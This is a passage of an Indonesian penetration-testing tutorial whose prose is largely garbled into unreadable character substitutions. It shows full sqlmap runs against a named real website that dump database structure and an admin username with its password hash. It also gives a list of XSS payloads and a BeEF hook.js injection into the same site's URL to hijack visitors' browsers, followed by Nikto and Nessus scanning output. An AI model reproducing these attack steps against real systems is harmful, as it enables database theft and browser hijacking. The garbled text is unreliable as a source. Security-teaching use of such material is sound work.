--crawl=CRAWLDEPTH Crawl the website starting from the
target url
--csv-del=CSVDEL Delimiting character used in CSV output
(default ",")
--eta Display for each output the estimated
time of arrival
--flush-session Flush session file for current target
--forms Parse and test forms on target url
--fresh-queries Ignores query results stored in session
file
--parse-errors Parse and display DBMS error messages
from responses
--replicate Replicate dumped data into a sqlite3
database
--save Save options to a configuration INI file
--tor Use Tor anonymity network
--tor-port=TORPORT Set Tor proxy port other than default
--tor-type=TORTYPE Set Tor proxy type (HTTP - default,
SOCKS4 or SOCKS5)
--update Update sqlmap
Miscellaneous:
-z MNEMONICS Use short mnemonics (e.g.
"flu,bat,ban,tec=EU")
--beep Sound alert when SQL injection found
--check-payload Offline WAF/IPS/IDS payload detection
testing
--check-waf Check for existence of WAF/IPS/IDS
protection
--cleanup Clean up the DBMS by sqlmap specific
UDF and tables
--dependencies Check for missing sqlmap dependencies
--gpage=GOOGLEPAGE Use Google dork results from specified
page number
--mobile Imitate smartphone through HTTP User-
Agent header
--page-rank Display page rank (PR) for Google dork
results
--smart Conduct through tests only if positive
heuristic(s)
--wizard Simple wizard interface for beginner
users
[*] shutting down at 14:09:18
Se/a$ai c,#t,h kita /isa $.#aka# %a/ *BT
+ ena56i/kan database
(#t.k -e%ihat &ata/ase 2a&a <e/ "a#$ !.%r# terha&a2 SU% i#jecti,# > -aka
2erhatika# +,r-at &i /a<ah i#i.
Sqlmap.py -u [ url yang terdapat vulnerability ] --dbs
root@eichel:/pentest/database/sqlmap# python sqlmap.py -u
"http://robot.indonesianbacktrack.or.id/?id=1&x=artikel" --dbs
sqlmap/1.0-dev (r4766) - automatic SQL injection and database
takeover tool
[14:17:42] [INFO] using
'/pentest/database/sqlmap/output/robot.indonesianbacktrack.or.id
/session' as session file
[14:17:43] [INFO] testing connection to the target url
[14:17:44] [INFO] heuristics detected web page charset 'ascii'
[14:17:44] [INFO] testing if the url is stable, wait a few
seconds
[14:17:45] [INFO] url is stable
[14:17:45] [INFO] testing if GET parameter 'id' is dynamic
[14:17:45] [INFO] confirming that GET parameter 'id' is dynamic
[14:17:46] [INFO] GET parameter 'id' is dynamic
[14:17:46] [INFO] heuristic test shows that GET parameter 'id'
might be injectable (possible DBMS: MySQL)
[14:17:46] [INFO] testing sql injection on GET parameter 'id'
[14:17:46] [INFO] testing 'AND boolean-based blind - WHERE or
HAVING clause'
[14:17:47] [INFO] GET parameter 'id' is 'AND boolean-based blind
- WHERE or HAVING clause' injectable
[14:17:47] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE
or HAVING clause'
[14:17:47] [INFO] GET parameter 'id' is 'MySQL >= 5.0 AND error-
based - WHERE or HAVING clause' injectable
[14:17:47] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[14:17:47] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
[14:17:57] [INFO] GET parameter 'id' is 'MySQL > 5.0.11 AND time-
based blind' injectable
[14:17:57] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10
columns'
[14:17:58] [INFO] ORDER BY technique seems to be usable. This
should reduce the time needed to find the right number of query
columns. Automatically extending the range for UNION query
injection technique
[14:17:58] [INFO] target url appears to have 4 columns in query
[14:17:59] [INFO] GET parameter 'id' is 'MySQL UNION query
(NULL) - 1 to 10 columns' injectable
GET parameter 'id' is vulnerable. Do you want to keep testing
the others (if any)? [y/N] y
[14:19:13] [INFO] testing if GET parameter 'x' is dynamic
[14:19:13] [INFO] confirming that GET parameter 'x' is dynamic
[14:19:15] [INFO] GET parameter 'x' is dynamic
[14:19:15] [WARNING] heuristic test shows that GET parameter 'x'
might not be injectable
[14:19:15] [INFO] testing sql injection on GET parameter 'x'
[14:19:15] [INFO] testing 'AND boolean-based blind - WHERE or
HAVING clause'
[14:19:24] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE
or HAVING clause'
[14:19:26] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[14:19:31] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
parsed error message(s) showed that the back-end DBMS could be
MySQL. Do you want to skip test payloads specific for other
DBMSes? [Y/n] y
[14:19:57] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10
columns'
[14:20:04] [WARNING] if UNION based SQL injection is not
detected, please consider usage of option '--union-char' (e.g.
--union-char=1) and/or try to force the back-end DBMS (e.g.
--dbms=mysql)
[14:20:09] [INFO] testing 'Generic UNION query (NULL) - 1 to 10
columns'
[14:20:15] [WARNING] GET parameter 'x' is not injectable
sqlmap identified the following injection points with a total of
104 HTTP(s) requests:
---
Place: GET
Parameter: id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=1 AND 1282=1282&x=artikel
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: id=1 AND (SELECT 1774 FROM(SELECT
COUNT(*),CONCAT(0x3a6d6c633a,(SELECT (CASE WHEN (1774=1774) THEN
1 ELSE 0 END)),0x3a7362663a,FLOOR(RAND(0)*2))x FROM
INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)&x=artikel
Type: UNION query
Title: MySQL UNION query (NULL) - 4 columns
Payload: id=1 UNION ALL SELECT NULL, NULL,
CONCAT(0x3a6d6c633a,0x47435348766a76725869,0x3a7362663a),
NULL#&x=artikel
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: id=1 AND SLEEP(5)&x=artikel
---
[14:20:15] [INFO] the back-end DBMS is MySQL
web application technology: Apache, PHP 5.3.9
back-end DBMS: MySQL 5.0
[14:20:15] [INFO] fetching database names
available databases [2]:
[*] information_schema
[*] warnaa_robot
[14:20:16] [INFO] Fetched data logged to text files under
'
Hasi% &ari ti#&aka# &i atas> -e-/eritah.ka# kita /ah<a !ersi "a#$ &i 2akai ,%eh sU%
i#jecti,# &i atas a&a%ah ter&a2at ' &ata/ase 2a&a siste- &ata/ase <e/ tar$et.
available databases [2]:
[*] information_schema
[*] warnaa_robot
+ ena56i/kan database
Sqlmap.py -u [ url yang terdapat vulnerability ] -D [database]
--tables
Sete%ah -e#&a2atka# #a-a &ata/ase kita &a2at -e#arik ata. -e#a-2i%ka# ta/e%
2a&a &ata/ase "a#$ &i#$i#ka#
"http://robot.indonesianbacktrack.or.id/?id=1&x=artikel" -D
warnaa_robot --tables
[14:38:53] [INFO] using
[14:38:53] [INFO] resuming injection data from session file
[14:38:53] [INFO] resuming back-end DBMS 'mysql 5.0' from
session file
0 HTTP(s) requests:
---
Place: GET
Parameter: id
Type: error-based
Type: UNION query
NULL#&x=artikel
---
[14:38:53] [INFO] fetching tables for database: warnaa_robot
Database: warnaa_robot
[2 tables]
+-------------+
| tbl_admin |
| tbl_artikel |
+-------------+
'
+ ena56i/kan ko/o5
*#+,r-asi "a#$ &i /.t.hka# attacker -aki# %e#$ka2. Met,&e se%a#j.t#"a > attacker
aka# -e#cari isi &ari k,%,- 2a&a ta/e% "a#$ &ite-.ka# .
sqlmap.py -u "[ url yang terdapat vulnerability ]" -D [ database
] -T [ tabel ] --columns
warnaa_robot -T tbl_admin --columns
[14:43:50] [INFO] using
session file
0 HTTP(s) requests:
---
Place: GET
Parameter: id
Type: error-based
Type: UNION query
NULL#&x=artikel
---
[14:43:51] [INFO] fetching columns for table 'tbl_admin' on
database 'warnaa_robot'
Table: tbl_admin
[2 columns]
+----------+--------------+
| Column | Type |
+----------+--------------+
| password | varchar(255) |
| username | varchar(20) |
+----------+--------------+
'
+ e/i2at isi ko/o5
(#t.k -e%ihat isi &ari k,%,- "a#$ te%ah &i &a2atka# -aka attacker aka# -e-as.ka#
2eri#tah
python sqlmap.py -u "[ url yang terdapat vulnerability ]" -D
[ database ] -T [ tabel ] -C [ kolom ] --dump
4eri#tah &.-2 aka# -e#a-2i%ka# se-.a isi &ari k,%,- "a#$ &it.j..
warnaa_robot -T tbl_admin -C password,username --dump
[14:49:31] [INFO] using
session file
0 HTTP(s) requests:
---
Place: GET
Parameter: id
Type: error-based
Type: UNION query
NULL#&x=artikel
---
do you want sqlmap to consider provided column(s):
[1] as LIKE column names (default)
[2] as exact column names
> 1
[14:49:44] [INFO] fetching columns LIKE 'password, username' for
table 'tbl_admin' on database 'warnaa_robot'
[14:49:44] [INFO] fetching entries of column(s) 'password,
username' for table 'tbl_admin' on database 'warnaa_robot'
[14:49:45] [INFO] analyzing table dump for possible password
hashes
recognized possible password hashes in column 'password'. Do
you want to crack them via a dictionary-based attack? [Y/n/q] Y
[14:49:56] [INFO] using hash method 'md5_generic_passwd'
what dictionary do you want to use?
[1] default dictionary file
'/pentest/database/sqlmap/txt/wordlist.txt' (press Enter)
[2] custom dictionary file
[3] file with list of dictionary files
>
[14:50:04] [INFO] using default dictionary
[14:50:04] [INFO] loading dictionary from
'/pentest/database/sqlmap/txt/wordlist.txt'
[14:50:12] [INFO] starting dictionary-based cracking
(md5_generic_passwd)
[14:50:12] [INFO] starting 2 processes
[14:50:16] [WARNING] no clear password(s) found
[14:50:16] [INFO] postprocessing table dump
Table: tbl_admin
[1 entry]
+----------------------------------+----------+
| password | username |
+----------------------------------+----------+
| a1adef2f61b8048e77ad3fdd72cbbf93 | admin |
+----------------------------------+----------+
[14:50:16] [INFO] Table 'warnaa_robot.tbl_admin' dumped to CSV
file
/dump/warnaa_robot/tbl_admin.csv'
'
4erhatika# ,.t2.t SDL-a2 &i-a#a t,,%s i#i aka# -e-i#ta a#&a -e-/eri#"a iji#
.#t.k -e%ak.ka# cracki#$ 2ara-eter terha&a2 isi k,%,-.
%.$ I56/e5entasi -SS
%.$.$. Testin1 b41
(#t.k -e#$etes !.%r# ata. ti&ak#"a 2a&a 1ss > /iasa#"a attacker aka# -e-as.ka#
scri2t 2a&a /r,<ser &i -a#a ter&a2at 1ss !.%#era/i%it". 4a&a 2,sti#$a# cassa2r,&i$"
2a&a +,r.- htt2QAA+,r.-.i#&,#esia#/acktrack.,r.i&Ash,<threa&.2h2Kti&^1933 >
/iasa#"a scri2t "a#$ &i#ject .#t.k -e-/.ktika# !.%#era/i%it" a&a%ah ja!ascri2t.
Sa%ah sat. c,#t,h#"a a&a%ah
<script>alert('tes')</script>
Da# /e/era2a scri2t %ai##"a "a#$ &i 2akai a#tara %ai##"a
<img src="livescript:[code]"> [N4]
<a href="about:<script>[code]</script>">
<meta http-equiv="refresh" content="0;url=j[code]">
<body onload="[code]">
&<script>[code]</script>
&{[code]}; [N4]
<img src=&{[code]};> [N4]
<link rel="stylesheet" href="j[code]">
<iframe src="vbscript:[code]"> [IE]
<img src="mocha:[code]"> [N4]
<img dynsrc="j[code]"> [IE]
<input type="image" dynsrc="j[code]"> [IE]
<bgsound src="j[code]"> [IE]
<div style="background-image: url(j[code]);">
<div style="behaviour: url([link to code]);"> [IE]
<div style="binding: url([link to code]);"> [Mozilla]
<div style="width: expression([code]);"> [IE]
<style type="text/javascript">[code]</style> [N4]
<object classid="clsid:..." codebase="j[code]"> [IE]
<style></script>
<![CDATA[</script>
<script>[code]</script>
<script>[code]</script>
<img src="blah"onmouseover="[code]">
<a href="javascript#[code]">
<div onmouseover="[code]">
<img src="j[code]">
<img src="blah>" onmouseover="[code]">
<xml src="j[code]">
<xml id="X"><a><b><script>[code]</script>;</b></a></xml>
<div datafld="b" dataformatas="html" datasrc="#X"></div>
[\xC0][\xBC]script>[code][\xC0][\xBC]/script> [UTF-8; IE, Opera]
Mas.ka# i#jeksi ja!ascri2it 2a&a %a/ .#t.k -e#$.ji 1ss !.%#era/i%it".
Ke-.&ia# sa"a -e#c,/a -e-as.ka# $a-/ar ke -e%a%.i scri2t h-t% <img
src=>
Ata. -e-as.ka# /e/era2a scri2t HTML %ai##"a
%.$.%. "ee3
Bee+ a&a%ah <e/ +ra-e<,rk 2e#etrati,# <e/ a2%icati,# "a#$ teri#sta%% secara &e+a.%t
2a&a /acktrack. Bee+ &a2at &iakses &ari -e#. #a$a ata. &ari ter-i#a%
USER/PASSWORD: beef/beef
[18:25:22][*] Browser Exploitation Framework (BeEF)
[18:25:22] | Version 0.4.2.11-alpha
[18:25:22] | Website http://beefproject.com
[18:25:22] | Run 'beef -h' for basic help.
[18:25:22] |_ Run 'svn update' to update to the latest
revision.
[18:25:23][*] Resetting the database for BeEF.
[18:25:28][*] BeEF is loading. Wait a few seconds...
[18:25:33][*] 9 extensions loaded:
[18:25:33] | Autoloader
[18:25:33] | Admin UI
[18:25:33] | Events
[18:25:33] | Console
[18:25:33] | Demos
[18:25:33] | XSSRays
[18:25:33] | Requester
[18:25:33] | Proxy
[18:25:33] |_ Initialization
[18:25:33][*] 55 modules enabled.
[18:25:33][*] 2 network interfaces were detected.
[18:25:33][+] running on network interface: 127.0.1.1
[18:25:33] | Hook URL: http://127.0.1.1:3000/hook.js
[18:25:33] |_ UI URL: http://127.0.1.1:3000/ui/panel
[18:25:33][+] running on network interface: 127.0.0.1
[18:25:33] | Hook URL: http://127.0.0.1:3000/hook.js
[18:25:33] |_ UI URL: http://127.0.0.1:3000/ui/panel
[18:25:33][+] HTTP Proxy: http://127.0.0.1:6789
[18:25:33][*] BeEF server started (press control+c to stop)
Se2erti "a#$ s.&ah &i /eritah. se/e%.-#"a> /ee+ -er.2aka# t,,%s /er/asis <e/ >
sehi#$$a .#t.k -e-as.ki /ee+ kita har.s -e#$akses#"a &e#$a# /r,<ser. Br,<ser
-e-a#$$i% i2 &e#$a# 2,rt sta#&art /ee+ I0;;;J. Ke-.&ia# -as.ka# .ser #a-e &a#
2ass<,r& -aka /r,<ser aka# -e-/.ka 1ss she%% /ee+ a#&a.
Bee+ &ira#ca#$ .#t.k -e#eri-a hasi% scri2t jahat "a#$ &i %a#carka# attacker &e#$a#
-e-a#+aatka# -et,&e 1ss. Ketika tar$et -e#$k%ik %i#k "a#$ s.&ah /erisi i#jeksi
2a&a <e/ /r,<ser > -aka 1ss she%% /ee+ aka# -e#a#$ka2 serta -e%ak.ka# i#jeksi
terha&a2 tar$et. Tar$et aka# &i -as.ka# &a%a- &a+tar H,-/i 2a&a k,%,- Ihooked
bro0sersJ
Se/a$ai c,#t,h ketika kita s.&ah -e#$etah.i a&a#"a ke-.#$ki#a# 1ss 2a&a <e/
tar$et -aka kita /isa -e#$e12%,itasi#"a &e#$a# -e-/erika# %i#k "a#$ -e#.j.
ke2a&a scri2t "a#$ te%ah &isia2ka# ,%eh /ee+ > "ait. Ihook18sJ. H,,k.js /er%,kasi
2a&a htt2QAAXi2A&,-ai#YQX2,rtYAh,,k.js. Attacker se/e#ar#"a -e-i%iki ke-.#$ki#a#
5;P5;P &e#$a# hara2a#> (RL &a2at &i esek.si ,%eh k,r/a# &a# ke-.&ia#
-e-/.ka ke-.#$ki#a# .#t.k -e#$i#jeksi k,r/a# %e/ih %a#j.t.
htt2QAAr,/,t.i#&,#esia#/acktrack.,r.i&AK1ârtike%?j.&.%^cscri2t
src^N htt2QAA1:'.169.1.3Q0;;;Ah,,k.js NacAscri2ta
Sa"a &e#$a# i2 1:'.169.1.' siste- ,2erasi <i#&,<s 7 aka# -e#c,/a -e-/.ka +i%e
terse/.t. Hasi%#"a a&a%ah se2erti $a-/ar &i /a<ah i#i.
Bee+ te%ah /erhasi% -e#a#$ka2 $B%.$.A.$.% se/a$ai Eombie "a#$ ke-.&ia# &a2at &i
e12%,itasi &e#$a# /er/a$ai +asi%itas %ai##"a "a#$ ter&a2at 2a&a /ee+.
Ketika tar$et te%ah /erhasi% -as.k 2a&a &a+tar H,-/ie > -aka /ee+ -e-e%iki
kese-2ata# .#t.k -e#$e12%,itasi#"a %e/ih ja.h. Se/a$ai c,#t,h sa"a -e-i%ih
.#t.k -e#$iri-ka# scri2t a%ert 2a&a k,-2.ter tar$et.
Maka scri2t terse/.t aka# &iesek.si 2a&a h,st tar$et.
9. !eb =4/nerabi/it7 scanner too/s
9.$. Nikto
Nikt, a&a%ah <e/ !.%#era/i%it" sca##er "a#$ -e-.#$ki#ka# 2e#tester .#t.k
-e%ak.ka# sca# 2a&a se/.ah h,st .#t.k -e#cari ke-.#$ki#a# !.%#era/i%it" /.$.
Nikt, &a2at &i akses 2a&a &irekt,ri
root@eichel:~# cd /pentest/web/nikto
root@eichel:/pentest/web/nikto# ls
docs nikto.conf nikto.pl plugins templates
(#t.k -e%ihat &a+tar ,2si 2eri#tah 2a&a #ikt, &a2at -e#ja%a#ka# #ikt, ta#2a ,2si
,2si %ai##"a
root@eichel:/pentest/web/nikto# ./nikto.pl
- Nikto v2.1.5
---------------------------------------------------------------
------------
+ ERROR: No host specified
-config+ Use this config file
-Display+ Turn on/off display outputs
-dbcheck check database and other key files
for syntax errors
-Format+ save file (-o) format
-Help Extended help information
-host+ target host
-id+ Host authentication to use, format
is id:pass or id:pass:realm
-list-plugins List all available plugins
-output+ Write output to this file
-nocache Disables the URI cache
-nossl Disables using SSL
-no404 Disables 404 checks
-Plugins+ List of plugins to run (default: ALL)
-port+ Port to use (default 80)
-root+ Prepend root value to all requests,
format is /directory
-Single Single request mode
-ssl Force ssl mode on port
-Tuning+ Scan tuning
-timeout+ Timeout for requests (default 10
seconds)
-update Update databases and plugins from
CIRT.net
-Version Print plugin and database versions
-vhost+ Virtual host (for Host header)
Z reU.ires a !a%.e
N,teQ This is the sh,rt he%2 ,.t2.t. (se H +,r +.%% he%2 te1t.
9.$.$. Nikto 6/41in
Nikt, &i&.k.#$ ,%eh /er/a$ai 2%.$i# "a#$ -asi#$-asi#$ -e-i%iki ke.#ika# &a#
t.j.a# /er/e&a .
root@eichel:/pentest/web/nikto/plugins# ls -al
total 1880
drwxr-xr-x 3 root root 12288 2012-02-12 02:02 .
drwxr-xr-x 6 root root 4096 2012-02-12 02:02 ..
-rw-r--r-- 1 root root 1702 2012-01-12 02:02 db_404_strings
-rw-r--r-- 1 root root 1997 2012-01-12 02:02 db_content_search
-rwxr-xr-x 1 root root 3045 2012-01-12 02:02 db_embedded
-rw-r--r-- 1 root root 7984 2012-01-12 02:02 db_favicon
-rw-r--r-- 1 root root 1414 2012-01-12 02:02 db_headers
-rw-r--r-- 1 root root 1495 2012-01-12 02:02 db_httpoptions
-rw-r--r-- 1 root root 918 2012-01-12 02:02
db_multiple_index
-rw-r--r-- 1 root root 130787 2012-01-12 02:02 db_outdated
-rwxr-xr-x 1 root root 907 2012-01-12 02:02
db_parked_strings
-rw-r--r-- 1 root root 10027 2012-01-12 02:02 db_realms
-rw-r--r-- 1 root root 32605 2012-01-12 02:02 db_server_msgs
-rwxr-xr-x 1 root root 5907 2012-01-12 02:02 db_subdomains
-rw-r--r-- 1 root root 1167671 2012-01-12 02:02 db_tests
-rw-r--r-- 1 root root 2286 2012-01-12 02:02 db_variables
-rwxr-xr-x 1 root root 197802 2012-01-12 02:02 LW2.pm
-rw-r--r-- 1 root root 1963 2012-01-12 02:02
nikto_apache_expect_xss.plugin
-rw-r--r-- 1 root root 7716 2012-01-12 02:02
nikto_apacheusers.plugin
-rwxr-xr-x 1 root root 7891 2012-01-12 02:02 nikto_auth.plugin
-rw-r--r-- 1 root root 3330 2012-01-12 02:02 nikto_cgi.plugin
-rw-r--r-- 1 root root 2946 2012-01-12 02:02
nikto_content_search.plugin
-rw-r--r-- 1 root root 3068 2012-01-12 02:02
nikto_cookies.plugin
-rw-r--r-- 1 root root 108326 2012-01-12 02:02
nikto_core.plugin
-rw-r--r-- 1 root root 3198 2012-01-12 02:02
nikto_dictionary_attack.plugin
nikto_embedded.plugin
-rw-r--r-- 1 root root 2327 2012-01-12 02:02
nikto_favicon.plugin
-rw-r--r-- 1 root root 9427 2012-01-12 02:02
nikto_headers.plugin
-rw-r--r-- 1 root root 6877 2012-01-12 02:02
nikto_httpoptions.plugin
-rw-r--r-- 1 root root 4334 2012-01-12 02:02
nikto_msgs.plugin
-rw-r--r-- 1 root root 3069 2012-01-12 02:02
nikto_multiple_index.plugin
-rw-r--r-- 1 root root 7315 2012-01-12 02:02
nikto_outdated.plugin
nikto_parked.plugin
-rw-r--r-- 1 root root 4682 2012-01-12 02:02
nikto_paths.plugin
-rw-r--r-- 1 root root 2830 2012-01-12 02:02
nikto_put_del_test.plugin
-rw-r--r-- 1 root root 2355 2012-01-12 02:02
nikto_report_csv.plugin
-rw-r--r-- 1 root root 8224 2012-01-12 02:02
nikto_report_html.plugin
-rw-r--r-- 1 root root 6965 2012-01-12 02:02
nikto_report_msf.plugin
-rw-r--r-- 1 root root 3446 2012-01-12 02:02
nikto_report_nbe.plugin
-rw-r--r-- 1 root root 2442 2012-01-12 02:02
nikto_report_text.plugin
-rw-r--r-- 1 root root 8576 2012-01-12 02:02
nikto_report_xml.plugin
-rw-r--r-- 1 root root 5509 2012-01-12 02:02
nikto_robots.plugin
-rw-r--r-- 1 root root 6318 2012-01-12 02:02
nikto_siebel.plugin
-rw-r--r-- 1 root root 8344 2012-01-12 02:02
nikto_single.plugin
-rw-r--r-- 1 root root 2377 2012-01-12 02:02 nikto_ssl.plugin
nikto_subdomain.plugin
-rw-r--r-- 1 root root 11141 2012-01-12 02:02
nikto_tests.plugin
drwxr-xr-x 6 root root 4096 2012-02-12 02:02 .svn
9.$.%. Conto2 6en114naan
C,#t,h 2e#$$.#aa# &ari #ikt, a&a%ah se/a$ai /erik.t.
e/ak4kan scannin1 ter2ada6 2ost tertent4 .
root@eichel:/pentest/web/nikto# ./nikto.pl -h http://127.0.0.1
- Nikto v2.1.5
---------------------------------------------------------------
------------
+ Target IP: 127.0.0.1
+ Target Hostname: localhost
+ Target Port: 80
+ Start Time: 2012-03-01 20:47:35 (GMT7)
---------------------------------------------------------------
------------
+ Server: Apache/2.2.14 (Ubuntu)
+ Retrieved x-powered-by header: PHP/5.3.2-1ubuntu4.9
+ Root page / redirects to: login.php
+ robots.txt contains 1 entry which should be manually viewed.
+ Apache/2.2.14 appears to be outdated (current is at least
Apache/2.2.19). Apache 1.3.42 (final release) and 2.0.64 are
also current.
+ OSVDB-3268: /config/: Directory indexing found.
+ /config/: Configuration information may be available remotely.
+ OSVDB-3268: /doc/: Directory indexing found.
+ OSVDB-48: /doc/: The /doc/ directory is browsable. This may
be /usr/doc.
+ OSVDB-12184: /index.php?=PHPB8B5F2A0-3C92-11d3-A3A9-
4C7B08C10000: PHP reveals potentially sensitive information via
certain HTTP requests that contain specific QUERY strings.
+ OSVDB-561: /server-status: This reveals Apache information.
Comment out appropriate line in httpd.conf or restrict access to
allowed hosts.
+ OSVDB-3268: : Directory indexing found.
+ OSVDB-3092: /login/: This might be interesting...
+ OSVDB-3092: /phpmyadmin/changelog.php: phpMyAdmin is for
managing MySQL databases, and should be protected or limited to
authorized hosts.
+ OSVDB-3093: /.bashrc: User home dir was found with a shell rc
file. This may reveal file and path information.
+ OSVDB-3268: /icons/: Directory indexing found.
+ OSVDB-3268: /docs/: Directory indexing found.
+ OSVDB-3092: /CHANGELOG.txt: A changelog was found.
+ OSVDB-3233: /icons/README: Apache default file found.
+ /login.php: Admin login page/section found.
+ /phpmyadmin/: phpMyAdmin directory found
+ 6474 items checked: 0 error(s) and 19 item(s) reported on
remote host
+ End Time: 2012-03-01 20:48:14 (GMT7) (39 seconds)
---------------------------------------------------------------
------------
1 host(s) tested
e/ak4kan scannin1 5en114nakan 6ort+6ort tertent4
Syantax : perl nikto.pl -h [ host/ip] -port [port]
root@eichel:/pentest/web/nikto# ./nikto.pl -h 127.0.0.1 -port 80
- Nikto v2.1.5
---------------------------------------------------------------
------------
+ Target IP: 127.0.0.1
+ Target Hostname: localhost
+ Target Port: 80
+ Start Time: 2012-03-01 20:53:44 (GMT7)
---------------------------------------------------------------
------------
+ Server: Apache/2.2.14 (Ubuntu)
+ Retrieved x-powered-by header: PHP/5.3.2-1ubuntu4.9
+ Root page / redirects to: login.php
+ robots.txt contains 1 entry which should be manually viewed.
+ Apache/2.2.14 appears to be outdated (current is at least
Apache/2.2.19). Apache 1.3.42 (final release) and 2.0.64 are
also current.
+ OSVDB-3268: /config/: Directory indexing found.
+ /config/: Configuration information may be available remotely.
+ OSVDB-3268: /doc/: Directory indexing found.
+ OSVDB-48: /doc/: The /doc/ directory is browsable. This may
be /usr/doc.
+ OSVDB-12184: /index.php?=PHPB8B5F2A0-3C92-11d3-A3A9-
4C7B08C10000: PHP reveals potentially sensitive information via
certain HTTP requests that contain specific QUERY strings.
+ OSVDB-561: /server-status: This reveals Apache information.
Comment out appropriate line in httpd.conf or restrict access to
allowed hosts.
+ OSVDB-3268: : Directory indexing found.
+ OSVDB-3092: /login/: This might be interesting...
+ OSVDB-3092: /phpmyadmin/changelog.php: phpMyAdmin is for
managing MySQL databases, and should be protected or limited to
authorized hosts.
+ OSVDB-3093: /.bashrc: User home dir was found with a shell rc
file. This may reveal file and path information.
+ OSVDB-3268: /icons/: Directory indexing found.
+ OSVDB-3268: /docs/: Directory indexing found.
+ OSVDB-3092: /CHANGELOG.txt: A changelog was found.
+ OSVDB-3233: /icons/README: Apache default file found.
+ /login.php: Admin login page/section found.
+ /phpmyadmin/: phpMyAdmin directory found
+ 6474 items checked: 0 error(s) and 19 item(s) reported on
remote host
+ End Time: 2012-03-01 20:54:03 (GMT7) (19 seconds)
---------------------------------------------------------------
+ 1 host(s) tested
4erhatika# hasi% ,.t2.t #ikt,> kita &a2at -e#arik kesi-2.%a# /ah<a #ikt, &a2at
-e%ak.ka# cra<% 2a&a &irekt,ri <e/ ser!er >-e#cari ha%a-a# %,$i# "a#$ a&a> &a#
-e#a-2i%ka# i#+,r-asi <e/ ser!er tar$et.
De#$a# %e/ih &ari sat. 2,rt
root@eichel:/pentest/web/nikto# perl nikto.pl -h example.com -p
80,443
- Nikto v2.1.5
---------------------------------------------------------------
+ No web server found on example.com:443
---------------------------------------------------------------
------------
+ Target IP: 192.0.43.10
+ Target Hostname: example.com
+ Target Port: 80
+ Start Time: 2012-03-01 21:09:19 (GMT7)
---------------------------------------------------------------
+ Server: BigIP
+ Root page / redirects to: http://www.iana.org/domains/example/
4eri#tah &i atas aka# -e%ak.ka# sca##i#$ /er&asarka# 2,rt 9; &a# 2,rt 330
De#$a# -e#e#t.ka# ra#$e 2,rt terte#t.
root@eichel:/pentest/web/nikto# perl nikto.pl -h example.com -p
80-150
4eri#tah &i atas aka# -e%ak.ka# sca##i#$ /er&asarka# ra#$e 2,rt 9; sa-2ai &e#$a#
15;.
O6si /ainn7a
Sca##i#$ &e#$a# -e#$$.#aka# 2r,1" terte#t.
root@eichel:/nikto.pl -h 127.0.0.1 -p 80,443 -useproxy
http://10.0.0.2:8888
Scannin1 den1an 5en114nakan te2nik t4nne/in1
root@eichel:/pentest/web/nikto# perl nikto.pl -h 127.0.0.1
-Tuning 06
9.%. Ness4s
Ness.s -er.2aka# t,,%s #et<,rk !.%#era/i%it" sca##er /er/asis <e/ "a#$ -e-i%iki
ke-a-2.a# .#t.k -e#$.ji kea-a#a# siste- /er&asarka# &icti,#ar" &a# 2%.$i#
serta -e%ak.ka# re2,rt terha&a2 hasi% terse/.t. Ness.s &i ke-/a#$ka# ,%eh Te#a/%e
Sec.rit" &a# te%ah -e#ja&i t,,%s "a#$ teri#c%.&e secara &e+a.%t 2a&a /acktrack %i#.1.
9.%.$. e5b4at 4ser
La#$kah a<a% .#t.k -e#$akti+ka# #ess.s a&a%ah -e-/.at .ser a&-i#istrat,r. (ser
i#i #a#ti#"a -e-i%iki ke-a-2.a# .#t.k %,$i# > -e#a-/ahka# .ser> -e#a-/ahka#
2%.$i#> .2&ate > &%%.
root@eichel:~# /opt/nessus/sbin/nessus-adduser
Login : zee-eichel
Login password :
Login password (again) :
Do you want this user to be a Nessus 'admin' user ? (can upload
plugins, etc...) (y/n) [n]: y
User rules
----------
nessusd has a rules system which allows you to restrict the
hosts
that zee-eichel has the right to test. For instance, you may
want
him to be able to scan his own host only.
Please see the nessus-adduser manual for the rules syntax
Enter the rules for this user, and enter a BLANK LINE once you
are done :
(the user can have an empty rules set)
Login : zee-eichel
Password : ***********
This user will have 'admin' privileges within the Nessus server
Rules :
Is that ok ? (y/n) [y] y
User added
9.%.%. Re1istrasi ness4s
Ste2 i#i sa#$at &i2er%.ka# .#t.k -e#ja%a#ka# #ess.s > kare#a #ess.s -e-/.t.hka#
.2&ate 2%.$i# secara %a#$s.#$.
root@eichel:~# /etc/init.d/nessusd start
Starting Nessus : .
root@eichel:~# Missing plugins. Attempting a plugin update...
Your installation is missing plugins. Please register and try
again.
To register, please visit http://www.nessus.org/register/
(#t.k -e%ak.ka# re$ister &a# -e#&a2atka# k,&e akti!asi > a#&a har.s -e#$.#j.#$i
sit.s res-i te2at#"a 2a&a htt2QAA<<<.#ess.s.,r$Are$isterA A#&a aka# &i 2erha&a2ka#
2a&a &.a 2i%iha#. Ya kare#a #ess.s -e-i%iki &.a je#is "ait. +ree @ ter/atas .#t.k 16
*4 B &a# !ersi 2r, @ /er/a"ar B
Mas.ka# .ser#a-e &a# e-ai% "a#$ !a%i&. Kare#a #ess.s aka# -e#$iri-ka# k,&e
akti!asi ke e-ai% terse/.t.
Jika se-.a#"a te%ah se%esai > /.ka%ah e-ai% "a#$ &i$.#aka# .#t.k -e#&a+tar ta&i
.#t.k -e#$a-/i% k,&e akti!asi. Di%a#j.tka# &e#$a# -e#$akti!asika# #ess.s. Dari
ter-i#a% ik.ti %a#$kah%a#$kah &i /a<ah i#i.
root@eichel:~# /opt/nessus/bin/nessus-fetch --register C47F-
59DA-019A-997D-A7C7
Your activation code has been registered properly - thank you.
Now fetching the newest plugin set from plugins.nessus.org...
Your Nessus installation is now up-to-date.
If auto_update is set to 'yes' in nessusd.conf, Nessus will
update the plugins by itself.
Kita ti#$$a% har.s -e#.#$$. sa-2ai #ess.s -e#"e%esaika# 2r,ses 2%.$i# .2&ate.
